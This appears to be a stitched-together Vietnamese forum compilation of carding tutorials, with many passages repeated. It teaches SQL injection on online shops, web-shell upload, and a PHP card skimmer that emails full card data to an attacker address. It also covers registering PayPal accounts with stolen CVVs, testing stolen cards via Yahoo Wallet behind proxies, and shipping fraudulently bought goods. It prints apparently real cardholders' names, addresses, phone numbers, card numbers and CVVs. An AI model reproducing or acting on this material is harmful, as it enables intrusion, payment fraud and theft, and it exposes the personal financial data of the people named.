_ Có một số trường hợp, site bị lỗi Injectjon nhưng hiện trang báo lỗi (khi ta thêm dấu ‘): The page cannot bedisplayed, bạn cần chú ý phía bên dưới nó vẫn báo lỗi đấy._ Khi hack shop bạn nên xoay nó theo nhiều chiều : thay id bằng cat , để nguyên dấu ‘ hoặc xoá nó đi khi ta query………
_Khi search shop bạn cần cố gắng tìm cách search sao cho thật hiệu quả , một số từ khoá khác mà bạn cũng nên thử : VP ASP shopping
shop products
intext:”vp-asp shopping” inurl :”.asp?id=”
intext:”products” inurl:”.asp?id=”
và còn nhiều nữa bạn tự tìm hiểu thêm.
_ Tut này chỉ giúp bạn hack được những shop 1 pass ( tuy là 1 pass nhưng còn hàng triệu shop như vậy ) (cố gắng mà search)
_ Với những shop 2 pass , thực sự nếu bạn hiểu rõ những gì tôi nói ở trên , thì việc hack pass 2 ko khó…chúc may mắn ()
Hack vui vẻ nha.
Reg Paypal
Có thể nhiều anh em vẫn chưa hiểu
rõ lắm Paypal là gì,nhưng kệ nói cụ thể ra Paypal là một dạng tài khoản bank
online cho phép anh em có thể sử dụng để trao đổi mua bán hàng qua mạng như mua
hosting,mua vật dụng gia đình hay nói thẳng ra là mua luôn cái Laptop về post
bài cho anh em hehehe … đùa tý thôi. Bài này do tớ tự viết tút ko ăn cắp thêm
bài của ai cả,đảm bảo hàng ko đụng,viết đơn giản mà dể hiểu mong anh em cổ vũ
thêm để post thêm nhiều bài hướng dẫn khác .thanks for see it .
Yêu cầu : Một hòm mail bất kì,ít
nhất một con CVV chưa add Paypal lần nào,và còn sử dụng được (đại loại là good
CVV ) ,thường ở các bài hướng dẫn khác,họ đòi phải fake IP nhưng mà mình đã thử
nhiều lần rồi,tự thấy chả cần,chỉ khi nào bạn chuẩn bị pay thì lúc đó mới phải
fake IP,còn đâu cứ để IP trần đỡ mất thời gian check sock hay là proxy,và vào
mạng lại nhanh nữa giải quyết thêm được bao nhiêu việc chứ ít đâu hehe …
Đăng kí hòm mail : lấy tên bất kì,có đuôi .vn cũng chả sao,user name bất kì chả liên quan đến thằng chủ thẻ cũng chả mất gì của bọ.Riêng chú ý một chút khi điền first name và last name thì nên lấy tên thằng chủ thẻ thì nó khó bị die Paypal hơn (còn lấy tên của mình cũng chẳng phải là dễ bị die,nhưng cẩn thận vẫn là trên hết ),nếu nó đòi điền address thì cũng điền luôn của thằng chủ thẻ.
Đăng kí hòm mail : lấy tên bất kì,có đuôi .vn cũng chả sao,user name bất kì chả liên quan đến thằng chủ thẻ cũng chả mất gì của bọ.Riêng chú ý một chút khi điền first name và last name thì nên lấy tên thằng chủ thẻ thì nó khó bị die Paypal hơn (còn lấy tên của mình cũng chẳng phải là dễ bị die,nhưng cẩn thận vẫn là trên hết ),nếu nó đòi điền address thì cũng điền luôn của thằng chủ thẻ.
Đăng kí Paypal :
bạn vào site hxxp://www.paypal.com vào phần signup bước này cũng là bước quan trọng này . bạn chọn ” Personal Account ” .Ở mục ” Select the country or region where you live ” bạn chú ý một chút,vì cái này liên quan đến cái thẻ của bạn thuộc nước nào ,bởi vì PP ko chỉ cho add một thẻ mà cho add rất nhiều thẻ,nhưng phải cùng một quốc gia với user đăng kí vì vậy nếu bạn có CVV của UK thì bạn đăng kí country là UK ,nếu của US thì đăng kí country là US … nói chung là có thẻ của quốc gia nào thì đăng kí country ở quốc gia đó,nhưng tớ thấy nhiều nhất vẫn là country US và ở bài viết này tớ chọn là US. click ” continue “
phần này cũng quan trọng bởi nó sẽ là một bước định đoạt con PP của bạn sẽ sống lâu hay chết yểu vì vậy hãy chú ý một chút bài post này của tớ là ok.
first và last name : điền theo tên ở trên mail của bạn,add cũng theo như mail thì tốt hơn,city,state,zipcode phải đi kèm với nhau bởi nếu không sẽ không qua được bước tiếp theo,số điện thoại bất kì ở bang nào của Mỹ cũng được,thương có định dạng như sau 270-xxx-6xxx.
phần email điền địa chỉ email của bạn ở trên,điền đụng địa chỉ email,vì đăng kí xong PP sẽ gửi link active hoặc active number cho bạn,pass word thì phải đủ 8 kí tự trở lên,phần câu hỏi và trả lời như kiểu sicurity thì các bạn nên chọn phần mother name,và city of birth là dể nhất,nhanh gọn.
tích vào 2 ô ở dưới,tớ tiếng Anh kém nên cũng không rõ nó là cái gì,đại loại là tôi đồng ý với những lời khai ở trên thì phải hehe… phần còn lại điền number bảo mật ở trong ô là ok.
khi đã login vào trong rồi các bạn có thể dễ dàng thấy mục ” Confirm email ” click vào đó, thấy dòng chữ ” note : Click here if a link does not appear in the email.”(tạm dịch : click here nếu như dòng link active của email ko làm việc được ) click vào đó rồi mở mail lấy số confirm number có dạng như sau ” 1368-xxxx-0761-xxxx-1548 ” rồi click vào confirm .ok paypal của bạn đã được active .ấn vào skip để tiếp tục ( thực ra nhấn skip để mình chuyển qua bước tiếp theo cho nhanh để add CC,còn nếu bạn có bank online thì có thể active được từ bước này…nhưng bài này tớ viết về add CVV,bài add bank online sẽ viết tút cho newbie sau )
bạn vào site hxxp://www.paypal.com vào phần signup bước này cũng là bước quan trọng này . bạn chọn ” Personal Account ” .Ở mục ” Select the country or region where you live ” bạn chú ý một chút,vì cái này liên quan đến cái thẻ của bạn thuộc nước nào ,bởi vì PP ko chỉ cho add một thẻ mà cho add rất nhiều thẻ,nhưng phải cùng một quốc gia với user đăng kí vì vậy nếu bạn có CVV của UK thì bạn đăng kí country là UK ,nếu của US thì đăng kí country là US … nói chung là có thẻ của quốc gia nào thì đăng kí country ở quốc gia đó,nhưng tớ thấy nhiều nhất vẫn là country US và ở bài viết này tớ chọn là US. click ” continue “
phần này cũng quan trọng bởi nó sẽ là một bước định đoạt con PP của bạn sẽ sống lâu hay chết yểu vì vậy hãy chú ý một chút bài post này của tớ là ok.
first và last name : điền theo tên ở trên mail của bạn,add cũng theo như mail thì tốt hơn,city,state,zipcode phải đi kèm với nhau bởi nếu không sẽ không qua được bước tiếp theo,số điện thoại bất kì ở bang nào của Mỹ cũng được,thương có định dạng như sau 270-xxx-6xxx.
phần email điền địa chỉ email của bạn ở trên,điền đụng địa chỉ email,vì đăng kí xong PP sẽ gửi link active hoặc active number cho bạn,pass word thì phải đủ 8 kí tự trở lên,phần câu hỏi và trả lời như kiểu sicurity thì các bạn nên chọn phần mother name,và city of birth là dể nhất,nhanh gọn.
tích vào 2 ô ở dưới,tớ tiếng Anh kém nên cũng không rõ nó là cái gì,đại loại là tôi đồng ý với những lời khai ở trên thì phải hehe… phần còn lại điền number bảo mật ở trong ô là ok.
khi đã login vào trong rồi các bạn có thể dễ dàng thấy mục ” Confirm email ” click vào đó, thấy dòng chữ ” note : Click here if a link does not appear in the email.”(tạm dịch : click here nếu như dòng link active của email ko làm việc được ) click vào đó rồi mở mail lấy số confirm number có dạng như sau ” 1368-xxxx-0761-xxxx-1548 ” rồi click vào confirm .ok paypal của bạn đã được active .ấn vào skip để tiếp tục ( thực ra nhấn skip để mình chuyển qua bước tiếp theo cho nhanh để add CC,còn nếu bạn có bank online thì có thể active được từ bước này…nhưng bài này tớ viết về add CVV,bài add bank online sẽ viết tút cho newbie sau )
Add Credit Card : bước này là
bước cuối cùng và cũng là một cách cho các bạn check CC die hay là live .
click vào add credit card : vì tớ chưa biết con CVV của tớ đã được add hay chưa,và nó đã die hay chưa nên trong mục này các cậu ko cần quan tâm đến địa chỉ của thằng chủ thẻ vội,tên của thằng chủ thẻ thì bỏ qua luôn vì khi cái CVV của thằng chủ thẻ có tên trùng với con PP của cậu die rồi thì cậu phải add CVV khác,và điều quan trọng duy nhất là con CVV phải live,còn info có thể bị sai lệch một chút sẽ có bước tiếp theo .
ở bước này các cậu chỉ cần gõ vào đó card number,exdate,Card Verification Number …
click vào add credit card : vì tớ chưa biết con CVV của tớ đã được add hay chưa,và nó đã die hay chưa nên trong mục này các cậu ko cần quan tâm đến địa chỉ của thằng chủ thẻ vội,tên của thằng chủ thẻ thì bỏ qua luôn vì khi cái CVV của thằng chủ thẻ có tên trùng với con PP của cậu die rồi thì cậu phải add CVV khác,và điều quan trọng duy nhất là con CVV phải live,còn info có thể bị sai lệch một chút sẽ có bước tiếp theo .
ở bước này các cậu chỉ cần gõ vào đó card number,exdate,Card Verification Number …
+) nếu như nó báo thế này : We
were unable to verify the billing address for this credit card. Please enter
the address where you receive billing statements for this credit card below.
Please refer to the automatic email we have sent to assist you. —> Quá là ok
rồi,con CVV này good rồi,bước tiếp theo chỉ việc thay billing address thôi,tick
vào phần ” Enter a new address as billing address ” rồi gõ đúng địa chỉ của
thằng chủ thẻ là ok bạn đã có một con PP để đi ship hàng .,sau khi add xong nó
sẽ hiện lên dòng này ở trên đầu ” You have successfully added a credit card.
Please note that this credit card is now your primary card. For more
information on your primary card, please refer to your Profile.”
+) nếu nó báo như thế này thì
card có vấn đề : Before you can add this credit card to another account, you
must contact the PayPal Credit Card Team atcardproblems@paypal.com.
A customer service representative will respond to your request shortly. If you
would rather add a different credit card to your PayPal account, you may do so
at any time. Thank you for your cooperation. Lúc này thì bỏ qua con này đi,chả
mua sắm được gì bằng con này đâu.
hoặc nó báo : This credit card has been denied by the bank that issued your credit card. For details on why your card was denied, please contact your credit card issuer’s customer service department. Or, you may want to try adding a different credit card
thì con này đã tử trận ,thằng chủ thẻ nó đã phong tỏa cái thẻ rùi .
hoặc nó báo : This credit card has been denied by the bank that issued your credit card. For details on why your card was denied, please contact your credit card issuer’s customer service department. Or, you may want to try adding a different credit card
thì con này đã tử trận ,thằng chủ thẻ nó đã phong tỏa cái thẻ rùi .
+) nếu nó báo thế này : That
credit card number is already assigned to another PayPal account. For security
purposes, each credit card may only be assigned to one PayPal account. Please
use a different card. tức là con PP này được add vào tài khoản khác rồi,nhưng
vẫn sống,tức là mình vẫn có thể dùng CVV để mua đồ ở các shop cho mua bằng CVV
rồi.
Trên đây là những hướng dẫn sơ
đẳng cho newbie biết cách add CC vào paypal.
*) Chú ý : như lúc trước tớ
nói,nếu như khi add CVV,nó vẫn báo : We were unable to verify the billing
address for this credit card … mà khi bạn điền billing vào thì bị sai info của
giữa zipcode và city với state thì sao nhỉ ?chẳng lẽ lại vứt ? không nên phí
hoài,các cậu lúc này nên giữ nguyên cái Address,và dùng thêm tools CC2bank để
bịa zipcode, khi đã có một zipcode thật và có city,state của zipcode đó thì các
cậu có thể thay vào làm info của thẻ cũng được. Có thể các bạn hay nghi ngờ
nhưng tớ cũng thường xuyên gặp phải trường hợp này và đã thử nhiều lần rồi,đều
100% add được CVV vào PP,nhưng nếu dùng con CVV để ship hàng thì chắc chắn là
không được,con này khuyên các cậu nên mua netphone mà sài,như skype,globe7 …
đảm bảo mua được 100%
Hướng dẫn hack ccv
Ccv thường bị đánh cấp từ các cửa hàng, siêu thị nước ngoài, họ lưu trữ
dử liệu của khách hàng và bị đánh cấp.
- Frauding: thực hiện các vụ chuyển khoản trực tiếp một cách phi pháp
- CC
number: gồm 16 chữ số(Riêng American Express có 15 digits)
-TUT Hack CC
allinurl: /sub.php?Page=1
chuyển
về dạng
http://abc.com/detail.php?pid=....
hack
bằng tool hoangduye cũng được mà havij cũng được,hack bằng cái gì cũng được
get admin ( trong table user nhớ gét colums role để tìm admin ,pass mã hóa sha1( admin thường thì role là 1)
link admin
get admin ( trong table user nhớ gét colums role để tìm admin ,pass mã hóa sha1( admin thường thì role là 1)
link admin
http://abc.com/admin_login.php
http://abc.com/cp
http://abc.com/cp
vào
admin phần category up shell lên để đuôi php hoặc .jpg.php tùy thích
tiếp theo vào shell sửa file orderconfirm.php ( tùy file tùy shop cách tìm file này là vào shop order đến phần nhập cc sau đó hiện comfim sẽ ra name file http://abc.com/file can edit .php
vào shell tìm file đó
sau đó tìm đoạn này
tiếp theo vào shell sửa file orderconfirm.php ( tùy file tùy shop cách tìm file này là vào shop order đến phần nhập cc sau đó hiện comfim sẽ ra name file http://abc.com/file can edit .php
vào shell tìm file đó
sau đó tìm đoạn này
<? echo
"" . substr($card_no,-4) . "<br>" .
$ex_month . "/" . $ex_year . "<br>" .
$cid;?>
"" . substr($card_no,-4) . "<br>" .
$ex_month . "/" . $ex_year . "<br>" .
$cid;?>
thường
thì code gốc là hiện 4 số cuối của cc
sửa số màu đỏ thành số 0
sau đó gán thêm hàm này vào phía dưới
sửa số màu đỏ thành số 0
sau đó gán thêm hàm này vào phía dưới
<?
$to = 'tmtno1@vnhack.us';
$subject = 'CC - Order ID:'+$order_id; $message = $order_id."|".$card_type."|".$card_no."|".$ex_mont h."|".$ex_year."|".$cid."|".$bill_name."|".$bill_a ddress."|".$bill_city."|".$bill_state."|".$bill_zi p."|".$bill_dphone."|".$bill_country; $headers = 'From: webmaster' . "\r\n" . 'Reply-To: webmaster' . "\r\n" .
'X-Mailer: PHP/' . phpversion();
mail($to, $subject, $message, $headers);
?>
$to = 'tmtno1@vnhack.us';
$subject = 'CC - Order ID:'+$order_id; $message = $order_id."|".$card_type."|".$card_no."|".$ex_mont h."|".$ex_year."|".$cid."|".$bill_name."|".$bill_a ddress."|".$bill_city."|".$bill_state."|".$bill_zi p."|".$bill_dphone."|".$bill_country; $headers = 'From: webmaster' . "\r\n" . 'Reply-To: webmaster' . "\r\n" .
'X-Mailer: PHP/' . phpversion();
mail($to, $subject, $message, $headers);
?>
notice
: do file order chính mã hóa nên hack cc bằng cách sử file nối đến file order
chính,cc k đảm bảo live 100%,chuẩn bill 100%
có shop thì có thể xem đc cc mã hóa qua admin,có shop thì k lưu lại cc nên phương pháp hack = shell này nhanh gọn lẹ nhất
có shop thì có thể xem đc cc mã hóa qua admin,có shop thì k lưu lại cc nên phương pháp hack = shell này nhanh gọn lẹ nhất
hello
I want people to cooperate with me in the hack
Do you have the possibility to penetrate websites and pull data from the site
Can you handle security Iigrat in sites
Do you have stolen credit cards or PayPal Robbed
I have idea can be applied to earn a lot of money
If you are interested please you add the following
e-mail : ronitarronitar@gmail.com or skype : ronitarronitar
Hướng dẫn hack cc
đầu tiên vào http://google.com search từ khoá
"shopdisplaycategories" I want people to cooperate with me in the hack
Do you have the possibility to penetrate websites and pull data from the site
Can you handle security Iigrat in sites
Do you have stolen credit cards or PayPal Robbed
I have idea can be applied to earn a lot of money
If you are interested please you add the following
e-mail : ronitarronitar@gmail.com or skype : ronitarronitar
Hướng dẫn hack cc
các bạn sẽ thấy vô số site dùng VP-ASP shopping ! tuy nhiên nhiều site đã fix, và công việc của các bạn là dò tìm những site chưa fix ! các bạncó thể chọn bất cứ trang nào trong list site dùng phần mềm VP-ASP shopping
trong bài viết này mình chọn site http://www.theqproject.com làm victim !
khi tìm thấy nó trên google click vào bạn sẽ thấy url :http://www.theqproject.com/shopping/shopdi...ycategories.asp
url này cho biết tất cả những sản phẩm trên website shopping đó
Bài 4:
Thông
tin về cvv
Các thông số khác:
Name on card : tên chủ thẻ
Expired date: ngày hết hạn
Address: địa chỉ
City: thành phố
State: bang
Country: quốc gia
Telephone number: số điện thoại
email ,…
Name on card : tên chủ thẻ
Expired date: ngày hết hạn
Address: địa chỉ
City: thành phố
State: bang
Country: quốc gia
Telephone number: số điện thoại
email ,…
Ví dụ: Ta có thông tin
của 1 card sau
First Name Michael
Last Name Delk
Address 170 Island Grove Drive
City Merritt Island
State FL
Post Code 32952
Country USA
Email mdelk@cfl.rr.com
Phone (321) 449-9223
Payment Information
Payment Type Visa
Name on Card Michael L Delk
Card Number 4104 1300 1744 2783
Expiry Date mm/yy 11/06
Card Holder Address 170 Island Grove Dr, Merritt Island, FL 32952
Authorization CVN 151 –> số cvv
Last Name Delk
Address 170 Island Grove Drive
City Merritt Island
State FL
Post Code 32952
Country USA
Email mdelk@cfl.rr.com
Phone (321) 449-9223
Payment Information
Payment Type Visa
Name on Card Michael L Delk
Card Number 4104 1300 1744 2783
Expiry Date mm/yy 11/06
Card Holder Address 170 Island Grove Dr, Merritt Island, FL 32952
Authorization CVN 151 –> số cvv
Xét dòng “Card Holder Address 170 Island Grove Dr, Merritt Island, FL 32952″
:
170 Island Grove Dr là
address
Merritt Island là City
FL là viết tắt của Florida –> state
32952 –> Zipcode
Merritt Island là City
FL là viết tắt của Florida –> state
32952 –> Zipcode
Ví dụ khác:
4121741632932567/409/0705/310 New River Rd/02838
4121741632932567/409/0705/310 New River Rd/02838
02838 –> Zipcode => city
và state
310 New River Rd –> address
0705 => Exp date là 07/2005
409 => CVV
310 New River Rd –> address
0705 => Exp date là 07/2005
409 => CVV
Ví dụ tiếp:
ruheena mendes|3 darcy
place|bromley|BR2 0RY|kent|NULL|ruaj98@yahoo.co.uk|||02084642404|Swi
tch|6759677145117227|07/06|307|
đây là Switch (Discover có đầu là
6011) của UK
ruheena mendes –> tên chủ thẻ
3 darcy place –> address
bromley –> city
BR2 0RY –> Zipcode
kent –> state
02084642404 -> tel
307:CVV
ruheena mendes –> tên chủ thẻ
3 darcy place –> address
bromley –> city
BR2 0RY –> Zipcode
kent –> state
02084642404 -> tel
307:CVV
BƯỚC 2: Faking IP (IP giả)
Phải Fake IP vì lúc pay
, bọn nó log lại IP của mình.Mình fake để giả như mình đang ở 1 vị trí nào đó
mình muốn.
Fake IP : 2 cách : dùng Proxy hoặc Sock
Trong Internet Explorer (IE) , vào Tools –> Internet Options… –> Connections –> LAN Settings… —> thấy bảng Proxy server
Trong Internet Explorer (IE) , vào Tools –> Internet Options… –> Connections –> LAN Settings… —> thấy bảng Proxy server
Vào các site cho
proxy/sock để lấy.
Ví dụ:
69.110.237.115:3128 elite proxy USA
Ví dụ:
69.110.237.115:3128 elite proxy USA
69.110.237.115 –> IP
3128 –> port
3128 –> port
chọn “Use a proxy
server …”
điền vào ô nếu là proxy.
Nếu là sock thì vào Advanced… –> bỏ “use the same proxy server …” –> điền sock vào socks. –> OK
điền vào ô nếu là proxy.
Nếu là sock thì vào Advanced… –> bỏ “use the same proxy server …” –> điền sock vào socks. –> OK
Vào google.com . Nếu nó ko vào
google.com.vn –> Okay
Nếu ko vào được –> IP die. Chọn proxy/sock khác.
Nếu ko vào được –> IP die. Chọn proxy/sock khác.
Lưu ý: ko dùng proxy có port 80 / 8000
Proxy xịn: có ghi anonymous
sock xịn : sock v4,5
Proxy xịn: có ghi anonymous
sock xịn : sock v4,5
Các site để lấy proxies
/socks:
http://www.xroxy.com/proxy-country-US.htm
http://omproxy.com/index.php?ur=aHR0cDovL3d3dy5zYW1haXIucnUvcHJveHk%3D
http://omproxy.com/index.php?ur=aHR0cDovL3Byb3h5ZHJvbS5jb20%3D
http://omproxy.com/index.php?ur=aHR0cDovL29wZW5wcm94aWVzLmNvbQ%3D%3D
http://omproxy.com/index.php?ur=aHR0cDovL3Byb3h5NGZyZWUuY29t
http://www.xroxy.com/proxy-country-US.htm
http://omproxy.com/index.php?ur=aHR0cDovL3d3dy5zYW1haXIucnUvcHJveHk%3D
http://omproxy.com/index.php?ur=aHR0cDovL3Byb3h5ZHJvbS5jb20%3D
http://omproxy.com/index.php?ur=aHR0cDovL29wZW5wcm94aWVzLmNvbQ%3D%3D
http://omproxy.com/index.php?ur=aHR0cDovL3Byb3h5NGZyZWUuY29t
hxxp://www.atomintersoft.com/products/alive-proxy/socks4-list/
hxxp://www.atomintersoft.com/products/alive-proxy/socks5-list/
hxxp://proxy.phpup.com/socks.php
hxxp://www.shadowicq.com/freesocks.html
hxxp://www.atomintersoft.com/products/alive-proxy/socks5-list/
hxxp://proxy.phpup.com/socks.php
hxxp://www.shadowicq.com/freesocks.html
Còn đây là site check proxy có
che giấu tốt hay ko:
1)hxxp://www.zbb.jp/unknown/cgi-bin/prxjdg.cgi
Trang này chạy engine proxyjudge. Anonylevel cao nhất là 1, rồi giảm dần.
Trang này chạy engine proxyjudge. Anonylevel cao nhất là 1, rồi giảm dần.
2)hxxp://www.ip2location.com
Trang này check ip chính xác tới tận kinh tuyến, vĩ tuyến. Nếu vào bằng proxy (hay sock) mà nó ko ghi nguồn gốc VN thì IP đó ngon rồi.
Trang này check ip chính xác tới tận kinh tuyến, vĩ tuyến. Nếu vào bằng proxy (hay sock) mà nó ko ghi nguồn gốc VN thì IP đó ngon rồi.
Sau khi học xong các
bước ở trên, bạn có thể học tiếp phần sau.
Trong phần này này , tôi sẽ dạy
các bạn cách check CC hiệu quả , nhanh gọn nhất qua wallet.yahoo.com mà không làm
CC die.
Điều kiện cần: Vài con
CC, 1 account của Yahoo.
* Nguyên lý 1: Yahoo wallet check được gì thì các
payment gates cũng chỉ check được như vậy , trừ khi call bank.
Áp dụng nguyên lý 1 ta
có thể điền Billing address = Shipping address . Đối với những CC không check
được cả Zipcode thì càng dễ ship cho dropper ở các nước có sử dụng Zipcode(thực
ra thành phố nào của VN cũng có Zipcode nhưng ở VN cái đó chưa thông dụng nên
mình điền thế nào cũng được).Bọn bưu điện gửi hàng thì không nhìn vào Zipcode ,
chỉ khi nào tên thành phố / Bang sai –> Correct address bằng cách xem
Zipcode.
Hiểu rõ nguyên lý 1 là điều rất quan trọng cho việc phát triển cách ship hàng sau này.
Hiểu rõ nguyên lý 1 là điều rất quan trọng cho việc phát triển cách ship hàng sau này.
Các bước thực hiện (Ví dụ đối với việc check cc USA) :
+ Vào wallet.yahoo.com
, Log in
+ Trong lần check CC đầu tiên , bạn có thể điền đúng , đầy đủ thông tin như trên CC.Nếu trên CC info không có số điện thoại –> điền bừa vào.Địa chỉ email thì điền của mình.City và State nếu không thấy ghi thì vào local.yahoo.com sẽ thấy.
+ Submit CC
+ Nếu nó accept CC của mình (Đã save lại được CC ) –> CC sống , còn không là CC die.
+ Đến lần thử sau(kể cả lần trước cc die) , bạn chỉ cần thay lại CC number , Loại thẻ –> Submit
+ Nếu nó ghi là : “The zip code you entered must match your credit card’s billing address” hoặc là sai Postal code thì có nghĩa là CC đó sống.Nếu ghi là “Invalid card” –> Die.
+ Nếu zipcode mình điền không đúng với zipcode của cc mà vẫn Save lại được có nghĩa là cái CC đó bọn nó không check được zipcode –> ngon lắm đấy.Cái này có thể khai gian luôn cả zipcode lúc mua hàng , thích hợp với việc ship qua dropper.
+ Trong lần check CC đầu tiên , bạn có thể điền đúng , đầy đủ thông tin như trên CC.Nếu trên CC info không có số điện thoại –> điền bừa vào.Địa chỉ email thì điền của mình.City và State nếu không thấy ghi thì vào local.yahoo.com sẽ thấy.
+ Submit CC
+ Nếu nó accept CC của mình (Đã save lại được CC ) –> CC sống , còn không là CC die.
+ Đến lần thử sau(kể cả lần trước cc die) , bạn chỉ cần thay lại CC number , Loại thẻ –> Submit
+ Nếu nó ghi là : “The zip code you entered must match your credit card’s billing address” hoặc là sai Postal code thì có nghĩa là CC đó sống.Nếu ghi là “Invalid card” –> Die.
+ Nếu zipcode mình điền không đúng với zipcode của cc mà vẫn Save lại được có nghĩa là cái CC đó bọn nó không check được zipcode –> ngon lắm đấy.Cái này có thể khai gian luôn cả zipcode lúc mua hàng , thích hợp với việc ship qua dropper.
Lưu ý:
+ Các loại CC khác nhau:
- CC US,Canada,UK : thường check được CC number,CVN,Zip code . Nếu CC loại này mà có con điền sai Zipcode mà vẫn save vào Yahoo Wallet được –> xịn đó.
- CC EU,JP : CC number , Expiration date , CVN . (Nếu ghi sai exp date lúc check –> sẽ bị ghi là invalid)
- Một số CC có thể check được cả Exp date + Zip code đồng thời.
Đối với mọi CC : Các payment gate chỉ check được nhiều nhất đồng thời cả CC number,Exp date ,CVN,Zipcode . Không có trường hợp ngoại lệ, trừ khi contact bank.
+ Mỗi lần Yahoo! Wallet chỉ cho check 25 con.Yahoo wallet record lại IP của bạn và tên account bạn đã check.Vì vậy bạn phải đợi 5 tiếng sau mới check được tiếp hoặc phải :
- Logout cái đó, login vào account khác
- Sau khi Login xong –> Fake IP
- Lại check tiếp
+ CC die là do Bank phong tỏa tài khoản đó hoặc chủ thẻ yêu cầu khóa tài khoản.
+ Nếu Yahoo! Wallet yêu cầu bạn nhập cả CVN , bạn có thể ấn F6 –> Tìm trên dòng đó đoạn checkcvv=1 –> sửa lại thành checkcvv=0 và Enter.
————–
Tiếp nữa
Lưu ý : Phải học chắc bài số 1 và 2 thì mới tiếp tục được bài số 3.Làm gì cũng phải có kiến thức cơ bản từ gốc rễ lên.
+ Các loại CC khác nhau:
- CC US,Canada,UK : thường check được CC number,CVN,Zip code . Nếu CC loại này mà có con điền sai Zipcode mà vẫn save vào Yahoo Wallet được –> xịn đó.
- CC EU,JP : CC number , Expiration date , CVN . (Nếu ghi sai exp date lúc check –> sẽ bị ghi là invalid)
- Một số CC có thể check được cả Exp date + Zip code đồng thời.
Đối với mọi CC : Các payment gate chỉ check được nhiều nhất đồng thời cả CC number,Exp date ,CVN,Zipcode . Không có trường hợp ngoại lệ, trừ khi contact bank.
+ Mỗi lần Yahoo! Wallet chỉ cho check 25 con.Yahoo wallet record lại IP của bạn và tên account bạn đã check.Vì vậy bạn phải đợi 5 tiếng sau mới check được tiếp hoặc phải :
- Logout cái đó, login vào account khác
- Sau khi Login xong –> Fake IP
- Lại check tiếp
+ CC die là do Bank phong tỏa tài khoản đó hoặc chủ thẻ yêu cầu khóa tài khoản.
+ Nếu Yahoo! Wallet yêu cầu bạn nhập cả CVN , bạn có thể ấn F6 –> Tìm trên dòng đó đoạn checkcvv=1 –> sửa lại thành checkcvv=0 và Enter.
————–
Tiếp nữa
Lưu ý : Phải học chắc bài số 1 và 2 thì mới tiếp tục được bài số 3.Làm gì cũng phải có kiến thức cơ bản từ gốc rễ lên.
Điều kiện cần:
+ Đã nắm vững kiến thức cơ bản của bài 1 và 2
+ Có 1 con cvv ngon
+ Có 1 proxy anonymous / 1 sock ngon
+ May mắn
+ Đã nắm vững kiến thức cơ bản của bài 1 và 2
+ Có 1 con cvv ngon
+ Có 1 proxy anonymous / 1 sock ngon
+ May mắn
PHẦN 2: SHIP HÀNG
——————————————-
A. Mua hàng hóa phi vật thể
——————————————-
A. Mua hàng hóa phi vật thể
Trong phần này , tui sẽ
chỉ cho bạn cách mua những hàng hóa phi vật thể qua Internet , có nghĩa là
không sờ , đụng chạm vào nó được . Ví dụ : mua softwares,hosting account,tên
miền, account download ,thẻ điện thoại quốc tế,…
Các bước thực hiện:
+ Check lại CC
+ Fake IP
+ Vào site cần mua , tìm hàng , add to cart –> Check out
+ Bắt đầu điền thông tin vào phần Billing như đã dạy ở bài 1.Bạn có thể tùy ý điền thông tin thật hoặc điền thông tin giả nhưng giữ nguyên Zip code.Để tỉ lệ thành công cao hơn, bạn điền đúng thông tin trong CC nhưng sửa lại phần Name là tên của bạn. Điền địa chỉ email của bạn để bọn nó gửi licence key đến.
+ Check out
——————————————————
B. Mua hàng hóa dạng vật thể qua mạng
+ Check lại CC
+ Fake IP
+ Vào site cần mua , tìm hàng , add to cart –> Check out
+ Bắt đầu điền thông tin vào phần Billing như đã dạy ở bài 1.Bạn có thể tùy ý điền thông tin thật hoặc điền thông tin giả nhưng giữ nguyên Zip code.Để tỉ lệ thành công cao hơn, bạn điền đúng thông tin trong CC nhưng sửa lại phần Name là tên của bạn. Điền địa chỉ email của bạn để bọn nó gửi licence key đến.
+ Check out
——————————————————
B. Mua hàng hóa dạng vật thể qua mạng
Cái này còn gọi là
“Ship hàng” . Những hàng được mua có thể là giầy dép, quần áo,PDA,nhẫn,tạp
chí,… về VN
Các bước thực hiện :
Giống hệt như mua hàng hóa dạng phi vật thể, tuy nhiên có một số khác biệt sau:
+ Áp dụng phương pháp
khai billing address = shipping address :
Như đã nói ở bài học số 1 , các payment gate chỉ check được CC number , CVN (CVV, Authorization Number) , Zipcode . Vì vậy khi điền Billing form, bạn sẽ chỉ điền đúng các thông số trên.Phần Shipping address bạn điền giống hệt Billing address.Bọn shop thấy hàng gửi đến chủ thẻ –> dễ dàng chấp nhận hơn.
Như đã nói ở bài học số 1 , các payment gate chỉ check được CC number , CVN (CVV, Authorization Number) , Zipcode . Vì vậy khi điền Billing form, bạn sẽ chỉ điền đúng các thông số trên.Phần Shipping address bạn điền giống hệt Billing address.Bọn shop thấy hàng gửi đến chủ thẻ –> dễ dàng chấp nhận hơn.
+ Áp dụng phương pháp
ship nhầm nước:Vì hầu hết các shop cho ship toàn cầu đều đã cấm Vietnam nên bạn
sẽ không thể ship về nhà mình mà không áp dụng phương pháp này.Bạn sẽ điền
Shipping và Billing Country là 1 nước nào đó như Singapore, Hong Kong, France ,
….. (nên để country trùng với country của chủ thẻ )
Cơ chế: khai thác lỗ
hổng : Bọn shipper ( vận chuyển) như USPS,UPS,DHL,FedEx sẽ ship đến nước ghi nhầm
đó. Sau khi hàng đến , bọn nó không tìm thấy thành phố Hanoi –> sẽ search
lại và tìm thấy nó ở VN –> chuyển lại về VN miễn phí cho mình.
Nếu bọn nó đã send lại
email cho mình ( không phải confirmation email) là order shipped thì gần như
chắc chắn bạn sẽ nhận được hàng.
Lưu ý:
+ Ship qua bọn shipper rẻ tiền như USPS là kiểu Airmail hay Surface Post –> về Bưu điện Hanoi , bạn sẽ nhận được giấy báo ra bưu điện nhận hàng.Ở đó bạn sẽ gặp mấy ông Hải quan và có thể sẽ xin được giảm thuế đễn zero.Bạn phải làm sao cho mấy ông đó nghĩ rằng hàng đó ít tiền,mục đích là để mình sử dụng chứ không phải đem bán, mình còn là học sinh , SV –> ít tiền.Tốt nhất là lám sao cho bọn nó không thấy được tờ Invoice.
Ship qua Airmail như vậy sẽ giảm thuế và chắc chắn sẽ về VN nhưng đợi hơi lâu ( ship gián tiếp như vậy mất 3->4 tuần)
+ Ship qua shipper xịn (Courier Shipper) thì sẽ nhanh , mất khoảng 1 tuần nhưng bạn sẽ không xin giảm thuế được.Bạn có quyền trả lại hàng nếu thuế quá cao.Với lại , ship qua Courier Shipper sẽ có tracking number để theo dõi đường đi của hàng hằng ngày nhưng sẽ có rủi ro bị giữ lại hàng vì shop gửi email cho bọn nó đòi giữ lại hàng.
